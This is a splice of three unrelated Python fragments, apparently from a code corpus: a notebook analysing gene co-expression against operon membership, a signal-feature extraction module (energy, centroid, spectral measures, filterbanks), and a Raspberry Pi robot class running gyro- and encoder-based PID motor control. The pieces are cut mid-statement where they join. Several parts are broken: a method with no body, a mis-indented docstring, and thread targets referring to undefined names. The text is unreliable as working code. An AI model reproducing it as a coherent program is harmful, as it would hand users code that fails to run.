# There are NaNs in cases where there are 0 co-expressed genes and therefore 0 non-cooperonic genes
# (the 0/0 division above yields NaN)
real_num_core_na = real_percent_non_cooperonic_coexpressed_core_genes.isna().sum()
real_num_acc_na = real_percent_non_cooperonic_coexpressed_acc_genes.isna().sum()
# Since we are concerned with "of those co-expressed genes how many are in NOT in the same operon", we will remove these
real_percent_non_cooperonic_coexpressed_core_genes_noNa = real_percent_non_cooperonic_coexpressed_core_genes.dropna(inplace=False)
real_percent_non_cooperonic_coexpressed_acc_genes_noNa = real_percent_non_cooperonic_coexpressed_acc_genes.dropna(inplace=False)
# In[16]:
## TEST: What does distribution look like before removing NaNs?
# Get bins using all data
hist, bins_num_percent_non_cooperonic_real = np.histogram(
    np.concatenate(
        [real_percent_non_cooperonic_coexpressed_core_genes.fillna(0),
         real_percent_non_cooperonic_coexpressed_acc_genes.fillna(0)]
    )
)
# Set up the matplotlib figure
fig, axes = plt.subplots(ncols=2, nrows=1)
# Distribution of percent of co-expressed genes that are NOT co-operonic in real data
sns.distplot(real_percent_non_cooperonic_coexpressed_core_genes.fillna(0),
             label='core',
             color='red',
             kde=False,
             bins=bins_num_percent_non_cooperonic_real,
             ax=axes[0])
sns.distplot(real_percent_non_cooperonic_coexpressed_acc_genes.fillna(0),
             label='accessory',
             color='blue',
             kde=False,
             bins=bins_num_percent_non_cooperonic_real,
             ax=axes[1])
# The previous title was a leftover placeholder: 'TEST'.format(...) called
# format() on a string with no placeholder, silently dropping the threshold.
plt.suptitle('Percent of co-expressed genes that are NOT co-operonic, NaNs filled with 0 (real data, threshold={})'.
             format(coexpression_threshold))
axes[0].legend(prop={'size': 12})
axes[1].legend(prop={'size': 12})
fig.text(0.5, 0.01, 'Percent of co-expressed non-cooperonic genes', ha='center')
axes[0].set_ylabel('Count')
# In[17]:
# Get bins using all data
hist, bins_num_percent_non_cooperonic_real = np.histogram(
    np.concatenate(
        [real_percent_non_cooperonic_coexpressed_core_genes_noNa,
         real_percent_non_cooperonic_coexpressed_acc_genes_noNa]
    )
)
# Set up the matplotlib figure
fig, axes = plt.subplots(ncols=2, nrows=1)
# Distribution of percent of co-expressed genes that are NOT co-operonic in real data
sns.distplot(real_percent_non_cooperonic_coexpressed_core_genes_noNa,
             label='core',
             color='red',
             kde=False,
             bins=bins_num_percent_non_cooperonic_real,
             ax=axes[0])
sns.distplot(real_percent_non_cooperonic_coexpressed_acc_genes_noNa,
             label='accessory',
             color='blue',
             kde=False,
             bins=bins_num_percent_non_cooperonic_real,
             ax=axes[1]
             )
plt.suptitle('Percent of co-expressed genes that are NOT co-operonic (real data, threshold={})'.
             format(coexpression_threshold))
axes[0].legend(prop={'size': 12})
axes[1].legend(prop={'size': 12})
fig.text(0.5, 0.01, 'Percent of co-expressed non-cooperonic genes', ha='center')
axes[0].set_ylabel('Count')
# In[18]:
# Calculate the percent of co-expressed genes that are non co-operonic (shuffled data)
shuffled_percent_non_cooperonic_coexpressed_core_genes = (
    shuffled_core_df['num_non_cooperonic_coexpressed_genes']/shuffled_core_df['num_coexpressed_genes'])
shuffled_percent_non_cooperonic_coexpressed_acc_genes = (
    shuffled_acc_df['num_non_cooperonic_coexpressed_genes']/shuffled_acc_df['num_coexpressed_genes'])
# There are NaNs in cases where there are 0 co-expressed genes and therefore 0 non-cooperonic genes
shuffled_num_core_na = shuffled_percent_non_cooperonic_coexpressed_core_genes.isna().sum()
shuffled_num_acc_na = shuffled_percent_non_cooperonic_coexpressed_acc_genes.isna().sum()
# Since we are concerned with "of those co-expressed genes how many are in NOT in the same operon", we will remove these
shuffled_percent_non_cooperonic_coexpressed_core_genes_noNa = shuffled_percent_non_cooperonic_coexpressed_core_genes.dropna(
    inplace=False)
shuffled_percent_non_cooperonic_coexpressed_acc_genes_noNa = shuffled_percent_non_cooperonic_coexpressed_acc_genes.dropna(
    inplace=False)
# In[19]:
# Get bins using all data
hist, bins_num_percent_non_cooperonic_shuffled = | |
<gh_stars>1-10
# -*- coding: utf-8 -*-
#Imports
from scipy.stats import kurtosis, skew
import novainstrumentation as ni
import numpy as np
from scipy import signal
# #################################### TEMPORAL DOMAIN ############################################################# #
########################################################################################################################
def distance(sig):
    """Total distance traveled by the signal.

    Sums the hypotenuse between consecutive samples (unit spacing on the
    x axis), i.e. the arc length of the signal if it were straightened.

    Parameters
    ----------
    sig: array-like
        the input signal.

    Returns
    -------
    float
        the straightened-out length of the signal (0 for length-1 input).
    """
    df_sig = np.diff(sig)
    # Vectorized sqrt(1 + diff^2), replacing the per-element Python loop.
    return float(np.sum(np.sqrt(1.0 + df_sig ** 2)))
# Autocorrelation
def autocorr(sig):
    """Zero-lag autocorrelation of the signal with itself.

    Parameters
    ----------
    sig: ndarray
        input from which autocorrelation is computed.

    Returns
    -------
    float
        single-point cross correlation of the sequence with itself.
    """
    correlation = np.correlate(sig, sig, mode="valid")
    return float(correlation)
def zero_cross(sig):
    """Number of zero crossings in the signal.

    Counts how many times the signal changes sign (positive to negative
    or vice versa) over its length.

    Parameters
    ----------
    sig: ndarray
        input from which the zero-crossing count is computed.

    Returns
    -------
    int
        number of sign changes along the signal.
    """
    signs = np.sign(sig)
    # A nonzero first difference of the sign sequence marks a crossing.
    return int(np.count_nonzero(np.diff(signs)))
def calc_meanadiff(sig):
    """Compute the mean of the absolute first differences of the signal.

    Parameters
    ----------
    sig: ndarray
        input from which the mean absolute difference is computed.

    Returns
    -------
    float
        mean absolute difference of consecutive samples.
    """
    # np.abs instead of builtin abs: explicit about operating on an array.
    return np.mean(np.abs(np.diff(sig)))
def calc_medadiff(sig):
    """Compute the median of the absolute first differences of the signal.

    (Docstring corrected: this computes the *median*, not the mean.)

    Parameters
    ----------
    sig: ndarray
        input from which the median absolute difference is computed.

    Returns
    -------
    float
        median absolute difference of consecutive samples.
    """
    return np.median(np.abs(np.diff(sig)))
def calc_sadiff(sig):
    """Compute the sum of the absolute first differences of the signal.

    (Docstring corrected: this is the *sum*, not the mean, of the
    absolute differences.)

    Parameters
    ----------
    sig: ndarray
        input from which the sum of absolute differences is computed.

    Returns
    -------
    scalar
        sum of absolute differences of consecutive samples.
    """
    return np.sum(np.abs(np.diff(sig)))
def calc_meandiff(sig):
    """Compute the mean of the (signed) first differences of the signal.

    (Docstring corrected: unlike calc_meanadiff, the differences here are
    NOT taken in absolute value.)

    Parameters
    ----------
    sig: ndarray
        input from which the mean difference is computed.

    Returns
    -------
    float
        mean of consecutive-sample differences.
    """
    return np.mean(np.diff(sig))
def calc_meddiff(sig):
    """Compute the median of the (signed) first differences of the signal.

    (Docstring corrected: this computes the *median*, not the mean, and
    the differences are not taken in absolute value.)

    Parameters
    ----------
    sig: ndarray
        input from which the median difference is computed.

    Returns
    -------
    float
        median of consecutive-sample differences.
    """
    return np.median(np.diff(sig))
#create time
def compute_time(sign, FS):
    """Return the time axis for a signal sampled at FS Hz.

    Parameters
    ----------
    sign: array-like
        the sampled signal (only its length is used).
    FS: scalar
        sampling frequency in Hz.

    Returns
    -------
    list of float
        time instants [0, 1/FS, 2/FS, ...], one per sample.
    """
    # Single comprehension instead of building a range list and rescaling it.
    return [i / FS for i in range(len(sign))]
def signal_energy(sign, time):
    """Computes the energy of the signal. For that, first is made the segmentation of the signal in 10 windows
    and after it's considered that the energy of the signal is the sum of all calculated points in each window.

    Parameters
    ----------
    sign: ndarray
        input signal whose windowed energy is computed.
    time: array-like
        time axis matching `sign` (as produced by compute_time).

    Returns
    -------
    energy: float list
        signal energy.
    time_energy: float list
        signal time energy
    """
    window_len = len(sign)
    # window for energy calculation
    if window_len < 10:
        window = 1
    else:
        window = window_len//10 # each window of the total signal will have 10 windows
    energy = np.zeros(window_len//window)
    time_energy = np.zeros(window_len//window)
    i = 0
    # Sum of squares per window; each window is stamped with the time at
    # its midpoint sample.
    for a in range(0, len(sign) - window, window):
        energy[i] = np.sum(np.array(sign[a:a+window])**2)
        interval_time = time[int(a+(window//2))]
        time_energy[i] = interval_time
        i += 1
    # NOTE(review): the loop stops `window` samples short of the end, so the
    # last slot(s) of energy/time_energy can remain 0 -- confirm whether the
    # signal tail is intentionally dropped.
    return list(energy), list(time_energy)
# Temporal Centroid
def centroid(sign, FS):
    """Temporal centroid of the signal energy.

    The signal is split into windows (see signal_energy); the centroid is
    the energy-weighted mean of the window mid-point times.

    Parameters
    ----------
    sign: ndarray
        input from which the temporal centroid is computed.
    FS: int
        signal sampling frequency.

    Returns
    -------
    centroid: float
        temporal centroid (0 when the signal carries no energy).
    """
    time_axis = compute_time(sign, FS)
    window_energy, window_times = signal_energy(sign, time_axis)
    weighted_sum = np.dot(np.array(window_times), np.array(window_energy))
    energy_total = np.sum(window_energy)
    # Degenerate case: no energy (or zero-weighted time) -> centroid at 0.
    if energy_total == 0 or weighted_sum == 0:
        return 0
    return weighted_sum / energy_total
# Total Energy
def total_energy(sign, FS):
    """Mean power of the signal: total energy divided by its duration.

    Parameters
    ----------
    sign: ndarray
        input signal.
    FS: scalar
        sampling frequency.

    Returns
    -------
    scalar
        sum of squared samples divided by the signal duration in seconds.
    """
    # Time axis inlined from compute_time; duration = last minus first instant.
    time_axis = [index / FS for index in range(len(sign))]
    return np.sum(np.array(sign) ** 2) / (time_axis[-1] - time_axis[0])
########################################################################################################################
# ############################################ SPECTRAL DOMAIN ####################################################### #
########################################################################################################################
def plotfft(s, fmax):
    """Magnitude spectrum of a signal (DC bin excluded).

    Parameters
    ----------
    s: array-like
        the input signal.
    fmax: int
        the sampling frequency.

    Returns
    -------
    f: array-like
        the frequency values (xx axis), up to fmax/2.
    fs: array-like
        the amplitude of the frequency values (yy axis).
    """
    n = len(s)
    spectrum = np.abs(np.fft.fft(s))
    freqs = np.linspace(0, fmax // 2, n // 2)
    # Keep the positive-frequency half, skipping the DC component.
    half = slice(1, n // 2)
    return freqs[half].copy(), spectrum[half].copy()
def _bigPeaks(s, th, min_peak_distance=5, peak_return_percentage=0.1):
    """Indices of the most significant spectral peaks.

    Finds peaks above `th`, discards peaks closer than
    `min_peak_distance`, and keeps only the top `peak_return_percentage`
    fraction ranked by amplitude. Returns [] when no peak survives.
    """
    no_peaks = []
    if not list(s):
        return no_peaks
    candidates = ni.peaks(s, th)
    if not list(candidates):
        return no_peaks
    candidates = ni.clean_near_peaks(s, candidates, min_peak_distance)
    if not list(candidates):
        return no_peaks
    # Sort ascending by amplitude and keep the tail (largest peaks).
    ranked = candidates[np.argsort(s[candidates])]
    keep = int(np.ceil(len(candidates) * peak_return_percentage))
    return ranked[-keep:]
# Compute Fundamental Frequency
def fundamental_frequency(s, FS):
    # TODO: review fundamental frequency to guarantee that f0 exists
    # suggestion peak level should be bigger
    """Compute fundamental frequency along the specified axes.

    The spectrum (above 0.5 Hz when possible) is searched for significant
    peaks; the lowest-frequency significant peak is returned as f0.

    Parameters
    ----------
    s: ndarray
        input from which fundamental frequency is computed.
    FS: int
        sampling frequency

    Returns
    -------
    f0: float
        frequency whose integer multiples best explain the content of the
        signal spectrum (0 when no significant peak is found).
    """
    s = s - np.mean(s)  # remove DC offset so it does not dominate the FFT
    f, fs = plotfft(s, FS)
    # plotfft already drops the DC bin; this keeps the first half of what
    # it returned.
    fs = fs[1:len(fs) // 2]
    f = f[1:len(f) // 2]
    try:
        cond = np.where(f > 0.5)[0][0]
    except IndexError:
        # No frequency above 0.5 Hz: search the whole remaining range.
        # (Narrowed from a bare `except:` that also hid real errors.)
        cond = 0
    bp = _bigPeaks(fs[cond:], 0)
    if not list(bp):
        f0 = 0
    else:
        bp = bp + cond  # re-offset peak indices into the full axis
        f0 = f[min(bp)]
    return f0
def max_frequency(sig, FS):
    """Compute the 0.95 spectral rolloff frequency.

    Parameters
    ----------
    sig: ndarray
        input from which max frequency is computed.
    FS: int
        sampling frequency

    Returns
    -------
    f_max: float
        frequency below which 95% of the cumulative spectral magnitude lies.
    """
    f, fs = plotfft(sig, FS)
    t = np.cumsum(fs)
    try:
        ind_mag = np.where(t > t[-1] * 0.95)[0][0]
    except IndexError:
        # Threshold never exceeded (or empty spectrum indexing failed):
        # fall back to the cumulative maximum.
        # (Narrowed from a bare `except:` that also hid real errors.)
        ind_mag = np.argmax(t)
    f_max = f[ind_mag]
    return f_max
def median_frequency(sig, FS):
    """Compute the spectral median frequency.

    Parameters
    ----------
    sig: ndarray
        input from which median frequency is computed.
    FS: int
        sampling frequency

    Returns
    -------
    f_median: float
        frequency below which 50% of the cumulative spectral magnitude lies.
    """
    f, fs = plotfft(sig, FS)
    t = np.cumsum(fs)
    try:
        ind_mag = np.where(t > t[-1] * 0.50)[0][0]
    except IndexError:
        # Threshold never exceeded (or empty spectrum indexing failed):
        # fall back to the cumulative maximum.
        # (Narrowed from a bare `except:` that also hid real errors.)
        ind_mag = np.argmax(t)
    f_median = f[ind_mag]
    return f_median
def ceps_coeff(sig,coefNumber):
    """Compute cepstral coefficients along the specified axes.

    Parameters
    ----------
    sig: ndarray
        input from which cepstral coefficients are computed.
    coefNumber:
        number of LPC coefficients used to derive the cepstral coefficients.

    Returns
    -------
    cc: float or tuple
        cepstral coefficients (a scalar when only one is produced).
    """
    # NOTE(review): `lpc_coef` and `lpcar2cc` are not imported in this
    # module's visible header -- presumably they come from a VOICEBOX-style
    # LPC helper module; confirm the import, otherwise this raises NameError.
    est=lpc_coef(sig,coefNumber)
    cc=lpcar2cc(est)
    # A single coefficient is returned as a float, several as a tuple.
    if len(cc)==1:
        cc=float(cc)
    else:
        cc=tuple(cc)
    return cc
# Power Spectrum Density
def max_power_spectrum(sig, FS):
    """Peak of the Welch power spectral density estimate of the signal.

    Parameters
    ----------
    sig: ndarray
        input signal.
    FS: scalar
        sampling frequency.

    Returns
    -------
    float
        maximum value of the PSD estimate.
    """
    deviation = np.std(sig)
    # Normalize by the standard deviation unless the signal is constant
    # (deviation == 0), which would divide by zero.
    data = sig if deviation == 0 else sig / deviation
    psd = signal.welch(data, int(FS), nperseg=len(sig))[1]
    return float(max(psd))
def power_bandwidth(sig, FS, samples):
    """Compute power spectrum density bandwidth along the specified axes.

    Parameters
    ----------
    sig: ndarray
        input signal whose PSD is estimated.
    FS: scalar
        sampling frequency
    samples: int
        number of bands

    Returns
    -------
    bandwidth: tuple of float
        the first `samples` PSD values (lowest-frequency bands).
    """
    bd = []
    bdd = []
    # NOTE(review): unlike max_power_spectrum, this always divides by the
    # standard deviation -- a constant signal (std == 0) divides by zero
    # here; confirm whether that input is possible.
    freq, power = signal.welch(sig/np.std(sig), FS, nperseg=len(sig))
    for i in range(len(power)):
        bd += [float(power[i])]
    # NOTE(review): assuming this truncation runs once after the loop --
    # confirm against the original file's indentation.
    bdd += bd[:samples]
    return tuple(bdd)
def trfbank(fs, nfft, lowfreq, linsc, logsc, nlinfilt, nlogfilt):
    """Compute triangular filterbank for MFCC computation.

    Parameters
    ----------
    fs: scalar
        sampling frequency.
    nfft: int
        number of FFT bins.
    lowfreq: scalar
        start frequency of the first (linearly spaced) filter.
    linsc: scalar
        spacing between the linearly spaced filters.
    logsc: scalar
        ratio between successive log-spaced filter frequencies.
    nlinfilt: int
        number of linearly spaced filters.
    nlogfilt: int
        number of log-spaced filters.

    Returns
    -------
    fbank: ndarray, shape (nlinfilt + nlogfilt, nfft)
        triangular filter weight per FFT bin.
    freqs: ndarray
        start/center/end frequencies of the filters.
    """
    # Total number of filters
    nfilt = nlinfilt + nlogfilt
    #------------------------
    # Compute the filter bank
    #------------------------
    # Compute start/middle/end points of the triangular filters in spectral domain
    freqs = np.zeros(nfilt+2) #modified
    freqs[:nlinfilt] = lowfreq + np.arange(nlinfilt) * linsc
    freqs[nlinfilt:] = freqs[nlinfilt-1] * logsc ** np.arange(1, nlogfilt + 3)
    # Height 2/(end-start) makes each triangle integrate to unit area.
    heights = 2./(freqs[2:] - freqs[0:-2])
    # Compute filterbank coeff (in fft domain, in bins)
    fbank = np.zeros((nfilt, nfft))
    # FFT bins (in Hz)
    nfreqs = np.arange(nfft) / (1. * nfft) * fs
    for i in range(nfilt):
        low = freqs[i]
        cen = freqs[i+1] #modified
        hi = freqs[i+2] #modified
        # Rising edge: bins between the filter start and its center.
        lid = np.arange(np.floor(low * nfft / fs) + 1,
                        np.floor(cen * nfft / fs) + 1, dtype=int)
        lslope = heights[i] / (cen - low)
        # Falling edge: bins between the center and the filter end.
        rid = np.arange(np.floor(cen * nfft / fs) + 1,
                        np.floor(hi * nfft / fs) + 1, dtype=int)
        rslope = heights[i] / (hi - cen)
        fbank[i][lid] = lslope * (nfreqs[lid] - low)
        fbank[i][rid] = rslope * (hi - nfreqs[rid])
    return fbank, freqs
########################################################################################################################
####################################### STATISTICAL DOMAIN #############################################################
########################################################################################################################
def interq_range(sig):
"""Compute interquartile range along the specified axis.
Parameters
----------
sig: ndarray
input from which interquartile range | |
import RPi.GPIO as GPIO
import time
import read_RPM
import threading
import setup_robo
import sys
import multiprocessing
from Gyro_new import Gyro
#from mpu6050 import mpu6050
class Control_robo:
    def __init__(self, encoder_1, encoder_2, SAMPLE_TIME, motor_1, motor_2):
        """Store hardware handles, start both PWM channels and calibrate the gyro.

        Parameters
        ----------
        encoder_1, encoder_2:
            left / right wheel encoder readers (must provide an RPM() method,
            see rpm_read).
        SAMPLE_TIME:
            PID refresh period in seconds (used by pid_angle's sleep).
        motor_1, motor_2:
            left / right motor descriptors exposing an `enable` GPIO pin.
        """
        self.encoder_1 = encoder_1 ## LEFT ENCODER
        self.encoder_2 = encoder_2 ## RIGHT ENCODER
        ### RPM DATA TO USE ON PID
        self.RPM_1 = 0
        self.RPM_2 = 0
        self.SAMPLE_TIME = SAMPLE_TIME
        self.motor_1 = motor_1 ##LEFT MOTOR
        self.motor_2 = motor_2 ##RIGHT MOTOR
        ## SETUP PWM (1 kHz on each motor enable pin, started at 25% duty)
        self.p = GPIO.PWM(self.motor_1.enable, 1000)
        self.p2 = GPIO.PWM(self.motor_2.enable, 1000)
        self.p.start(25)
        self.p2.start(25)
        ## SETUP START DUTY VALUES
        self.duty_1_value = 15
        self.duty_2_value = 15
        #self.TARGET = 80 # USE ONLY WITH PID ENCODER CONTROL
        ## SETUP INITIAL TARGETS TO RPM
        self.TARGET_1 = 80 #USE WITH PID ENCODER + GYRO CONTROL (DONT CHANGE WITH TIME)
        self.TARGET_2 = 80 #USE WITH PID ENCODER + GYRO CONTROL (THIS CHANGES WITH TIME)
        ## SETUP INITIAL TARGET TO GYRO
        self.TARGET_ANGLE = 0 # USE WITH PID ENCODER + GYRO CONTROL
        self.angle_z = 0 #VARIABLE WITH GYRO READ DATA
        self.select = 'p'  # current drive command; pid_angle forces low duty for 'p'
        self.gyro = Gyro()
        self.gyro.calibration()
        self.focus = 0
    # NOTE(review): `background_2` has no body in this copy -- as written this
    # is a syntax error; presumably the body was lost in formatting (or run_2
    # was meant to be nested inside it). Confirm against the original file.
    def background_2(self):
    def run_2(self):
        """Spawn the gyro-read, encoder-read and PID daemon threads."""
        ## CREATE THREAD TO READ IMU DATA
        print("Starting Thread 1")
        # NOTE(review): thread targets use the bare names (gyro_read, rpm_read,
        # pid_angle) with the object passed via args; if these are methods of
        # this class the bare names raise NameError -- presumably they exist as
        # module-level functions taking the robot object, or should be
        # self.gyro_read etc. Confirm.
        thread_gyro = threading.Thread(target = gyro_read, args = (self,))
        thread_gyro.daemon = True
        thread_gyro.start()
        ## CREAT THREAD TO READ ENCODERS DATA
        print("Starting Thread 2")
        thread_RPM = threading.Thread(target = rpm_read, args = (self,))
        thread_RPM.daemon = True
        thread_RPM.start()
        ### CREATE THREAD TO PID CONTROL
        print("Starting Thread 3")
        thread_PID = threading.Thread(target = pid_angle, args =(self,))
        thread_PID.daemon = True
        thread_PID.start()
    def rpm_read(self):
        """Continuously refresh the cached RPM readings from both encoders.

        Runs forever; meant to be started as a daemon thread. Note the
        sleep is commented out, so this loop spins as fast as possible.
        """
        while True:
            self.RPM_1 = self.encoder_1.RPM()
            self.RPM_2 = self.encoder_2.RPM()
            #time.sleep(SAMPLE_TIME/100) ## define the refresh rate to read RPM
    def gyro_read(self):
        """Continuously refresh self.angle_z from the gyro (daemon thread)."""
        ## THE REFRESH RATE ALREADY IS ON GYRO CLASS (DONT CHANGE THE RATE)
        while True:
            angle_data = self.gyro.reading()
            self.angle_z = angle_data['z']
            '''
            angle_x = angle_data['x']
            angle_y = angle_data['y']
            print("ANGLE DATA Z: ",self.angle_z)
            print("ANGLE DATA x: ", angle_x)
            print("ANGLE DATA Y: ", angle_y)
            '''
            ##REFRESH Z AXIS GYRO DATA WITH GYRO READ FREQUENCY
            ## increase the gyro frequency now that we use an independent thread? TEST
            ## CREATE A THREAD FOR RPM_READ TOO?? it might be worthwhile:
            ## one thread for the PID control and focus, another for the RPM read and another for the gyro read
            ## would that cause rate interference or improve performance??
            ## read_rpm has one rate, the gyro another; can the PID be optimized by keeping them separate?
    def pid_angle(self):
        """PID loop: steer toward TARGET_ANGLE (via TARGET_2) and hold wheel RPMs.

        Runs forever; meant to be started as a daemon thread. Reads the
        shared self.angle_z / self.RPM_1 / self.RPM_2 refreshed by the
        reader threads and writes both PWM duty cycles each cycle.
        """
        # KI BEST VALUES SO FAR
        '''
        KP = 0.0032
        KD = 0.0008
        KI = 0.00002
        '''
        error_prev = 0   # previous angle error (derivative term)
        sum_z = 0        # accumulated angle error (integral term)
        ## PID RPM DATA
        KPr = 0.05
        KDr = 0.03
        KIr = 0.0005
        e1_prev = 0
        e2_prev = 0
        e1_sum = 0
        e2_sum = 0
        while True:
            ## CALCULATE ERROR FOR ANGLE DATA
            ## USES GLOBAL ANGLE READ AT READ_THREAD
            error_z = self.TARGET_ANGLE - self.angle_z ## NEGATIVE ERROR WHEN TURNING RIGHT
            diff_z = (error_z - error_prev)/0.02 ## CHANGE THIS VALUE OF TIME IF CHANGE SAMPLE RATE
            print("error: ", error_z)
            ## CALL FOCUS FUNCTION TO FIND THE WAY IF TOO LOST
            '''
            if error_z > 35 or error_z < -35:
                focus(self)
            '''
            ## when here this thread stops the pid control to work at focus, is this a problem??
            ## when leaving focus we must restore each motor's output condition
            ## with the duty cycle it had before
            ## CALL DIRECTION FUNCTION WITH PID TO ANGLE CONTROL
            direction(self, error_z, diff_z, sum_z)
            # Clamp the right-wheel RPM target to [50, 250].
            self.TARGET_2 = max(min(250, self.TARGET_2), 50)
            ## CALCULATE ERROR FOR RPM DATA
            # NOTE(review): RPM_1_error/e1_diff (and the _2 pair) are only
            # assigned when the reading is < 600; if the first iteration reads
            # >= 600 the uses below raise NameError, and later iterations
            # silently reuse stale values. Confirm this is intended.
            if self.RPM_1 < 600:
                RPM_1_error = self.TARGET_1 - self.RPM_1 ##WILL TRY TO BE ARROUND 100
                e1_diff = (RPM_1_error - e1_prev) ## DERIVATIVE ERROR
            if self.RPM_2 < 600:
                RPM_2_error = self.TARGET_2 - self.RPM_2 ##WILL TRY TO STABILIZE ANGLE
                e2_diff = (RPM_2_error - e2_prev)
            ##DERIVATIVE ERROR FOR RPM
            #e1_diff = (RPM_1_error - e1_prev)
            #e2_diff = (RPM_2_error - e2_prev)
            # Apply the RPM PID only for motion commands; 'p' forces a fixed
            # low duty (idle).
            if self.select in ('w', 's', 't', 'y', 'h','l','m'):
                self.duty_1_value = self.duty_1_value + (RPM_1_error * KPr) + (e1_diff * KDr) + (e1_sum * KIr)
                self.duty_2_value = self.duty_2_value + (RPM_2_error * KPr) + (e2_diff * KDr) + (e2_sum * KIr)
            if self.select == 'p':
                self.duty_1_value = 10
                self.duty_2_value = 10
            # Keep duty cycles inside the valid PWM range [0, 100].
            self.duty_1_value = max(min(100,self.duty_1_value), 0)
            self.duty_2_value = max(min(100,self.duty_2_value),0)
            print("RPM 1: ", self.RPM_1)
            print("RPM 2: ", self.RPM_2)
            print("\n")
            print("DUTY VALUE: ", self.duty_1_value)
            print("DUTY VALUE 2: ", self.duty_2_value)
            print("\n")
            print("SOMA: ", round(sum_z,3))
            print("DIFF: ", round(diff_z,3))
            print("\n")
            print("TARGET 2: ", self.TARGET_2)
            print("TARGET 1: ", self.TARGET_1)
            print("\n")
            print("ERRO ENCODER 1: ", RPM_1_error)
            print("ERRO ENCODER 2: ", RPM_2_error)
            print("#####################")
            ## CHANGE DUTY CYCLE VALUES
            self.p.ChangeDutyCycle(self.duty_1_value)
            self.p2.ChangeDutyCycle(self.duty_2_value)
            time.sleep(self.SAMPLE_TIME) ## refresh rate to PID control
            ## changing this rate may change the values of the constants KP, KI, KD
            # Freeze the angle-PID history while stopped ('p').
            if self.select != 'p':
                error_prev = error_z
                sum_z += error_z
            ## ENCODERS NEW ERRORS DATA
            # NOTE(review): original indentation is ambiguous here -- these
            # updates are assumed to run every cycle (outside the `if` above);
            # confirm against the original file.
            e1_prev = RPM_1_error
            e2_prev = RPM_2_error
            e1_sum += RPM_1_error
            e2_sum += RPM_2_error
def direction(self, error_z, diff_z, sum_z):
    """Steer by nudging the right wheel's RPM setpoint (``self.TARGET_2``).

    Runs a PD (or PID, depending on branch) step on the heading error and
    adjusts ``self.TARGET_2`` relative to either ``self.TARGET_1`` (during
    sign/level transitions, integral term discarded) or the current
    ``self.TARGET_2``. Only active while driving forward ('w') or
    backward ('s'); does nothing when ``error_z`` is exactly zero.

    Args:
        error_z: heading error (TARGET_ANGLE - angle_z).
        diff_z: derivative of the heading error.
        sum_z: accumulated (integral) heading error.
    """
    # Heading-loop PID gains.
    kp = 0.0032
    kd = 0.0008
    ki = 0.00002
    # TODO(review): redo the backward-direction tests — the original file
    # with the verified conditions was lost.
    if self.select == 'w':
        if error_z > 0:
            if self.TARGET_2 > 80:
                # Transition: re-anchor on TARGET_1 and drop the integral term.
                self.TARGET_2 = self.TARGET_1 - (error_z * kp) - (diff_z * kd)
                print("codiçao 1")
            else:
                self.TARGET_2 = self.TARGET_2 - (error_z * kp) - (diff_z * kd) - (sum_z * ki)
                print("condicao 2")
        elif error_z < 0:
            if self.TARGET_2 <= 80:
                # Transition: re-anchor on TARGET_1 and drop the integral term.
                self.TARGET_2 = self.TARGET_1 - (error_z * kp) - (diff_z * kd)
                print("condicao 3")
            else:
                self.TARGET_2 = self.TARGET_2 - (error_z * kp) - (diff_z * kd) - (sum_z * ki)
                print("condicao 4")
    if self.select == 's':
        # Backward: correction signs are mirrored.
        if error_z > 0:
            if self.TARGET_2 <= 80:
                self.TARGET_2 = self.TARGET_1 + (error_z * kp) + (diff_z * kd)
                print("codiçao 1")
            else:
                self.TARGET_2 = self.TARGET_2 + (error_z * kp) + (diff_z * kd) + (sum_z * ki)
                print("condicao 2")
        elif error_z < 0:
            if self.TARGET_2 > 80:
                self.TARGET_2 = self.TARGET_1 + (error_z * kp) + (diff_z * kd)
                print("condicao 3")
            else:
                self.TARGET_2 = self.TARGET_2 + (error_z * kp) + (diff_z * kd) + (sum_z * ki)
                print("condicao 4")
def focus(self):
    """Re-orientation routine: stop, then pivot in place until the heading
    is within TARGET_ANGLE +/- 10 degrees, then resume driving via run_2().

    Pivots in short 1.5 s pulses (left wheel forward, right wheel backward)
    with 1.5 s pauses, re-checking ``self.angle_z`` (refreshed by the gyro
    reader thread) between pulses.
    """
    # Stop both motors.
    GPIO.output(self.motor_1.in1, GPIO.LOW)
    GPIO.output(self.motor_1.in2, GPIO.LOW)
    ## RIGHT MOTOR
    GPIO.output(self.motor_2.in1, GPIO.LOW)
    GPIO.output(self.motor_2.in2, GPIO.LOW)
    # Drive both channels at motor 1's duty (roughly the ~80 rpm duty).
    self.p.ChangeDutyCycle(self.duty_1_value)
    self.p2.ChangeDutyCycle(self.duty_1_value)
    # Pulse-turn until the heading is inside the 20-degree target window.
    while self.angle_z < self.TARGET_ANGLE - 10 or self.angle_z > self.TARGET_ANGLE + 10:
        ## LEFT MOTOR FORWARD
        GPIO.output(self.motor_1.in1, GPIO.HIGH)
        GPIO.output(self.motor_1.in2, GPIO.LOW)
        ## RIGHT MOTOR BACKWARD
        # Fix: this block previously toggled motor_1 again, overwriting the
        # "forward" command just issued and leaving motor_2 stopped; per the
        # comment above, the intent is to reverse the RIGHT motor (motor_2).
        GPIO.output(self.motor_2.in1, GPIO.LOW)
        GPIO.output(self.motor_2.in2, GPIO.HIGH)
        time.sleep(1.5)  # pivot for 1.5 seconds
        # Stop both motors again and let the gyro settle before re-checking.
        GPIO.output(self.motor_1.in1, GPIO.LOW)
        GPIO.output(self.motor_1.in2, GPIO.LOW)
        GPIO.output(self.motor_2.in1, GPIO.LOW)
        GPIO.output(self.motor_2.in2, GPIO.LOW)
        time.sleep(1.5)  # settle for 1.5 seconds
    # TODO(review): restore each motor's previous direction pins and duty
    # (from the last direction selection) instead of unconditionally calling
    # run_2(); see the notes in the original code about avoiding duplicated
    # if-chains from the main direction thread.
    run_2(self)
def set_speed(self, x):
temp1 = 1
self.select = x
if x == 'r':
print("run")
if (temp1 == 1):
##LEFT MOTOR
GPIO.output(self.motor_1.in1, GPIO.HIGH)
GPIO.output(self.motor_1.in2, GPIO.LOW)
##RIGHT MOTOR
GPIO.output(self.motor_2.in1, GPIO.HIGH)
GPIO.output(self.motor_2.in2, GPIO.LOW)
print("forward")
x = 'z'
else:
##LEFT MOTOR
GPIO.output(self.motor_1.in1, GPIO.LOW)
GPIO.output(self.motor_1.in2, GPIO.HIGH)
##RIGHT MOTOR
GPIO.output(self.motor_2.in1, GPIO.LOW)
GPIO.output(self.motor_2.in2, GPIO.HIGH)
print("backward")
temp1 = 0
x = 'z'
elif x == 'p':
print("stop")
##LEFT MOTOR
GPIO.output(self.motor_1.in1, GPIO.LOW)
GPIO.output(self.motor_1.in2, GPIO.LOW)
##RIGHT MOTOR
GPIO.output(self.motor_2.in1, GPIO.LOW)
GPIO.output(self.motor_2.in2, GPIO.LOW)
self.duty_1_value = 10
